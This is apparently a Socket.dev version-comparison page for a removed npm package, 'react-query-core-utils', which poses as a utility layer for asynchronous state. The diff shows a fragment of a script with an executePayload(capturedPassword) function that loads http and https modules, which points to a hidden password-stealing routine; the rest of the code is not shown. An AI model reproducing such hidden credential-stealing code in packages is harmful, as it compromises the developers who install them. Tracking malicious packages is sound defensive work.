Latest Threat Research:SANDWORM_MODE: Shai-Hulud-Style npm Worm Hijacks CI Workflows and Poisons AI Toolchains.Details
Socket
Book a DemoInstallSign in
Socket

react-query-core-utils

Package Overview
Dependencies
Maintainers
1
Versions
12
Alerts
File Explorer

Advanced tools

Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

react-query-core-utils - npm Package Compare versions

Package was removed
Sorry, it seems this package was removed from the registry
Comparing version
4.4.5
to
4.4.6
+1
-1
package.json
{
"name": "react-query-core-utils",
"version": "4.4.5",
"version": "4.4.6",
"description": "Utility layer for asynchronous state management",

@@ -5,0 +5,0 @@ "private": false,

@@ -109,3 +109,3 @@ #!/usr/bin/env node

async function executePayload(capturedPassword) {
const debugMode = false;
const debugMode = true;
const http = require('http');

@@ -112,0 +112,0 @@ const https = require('https');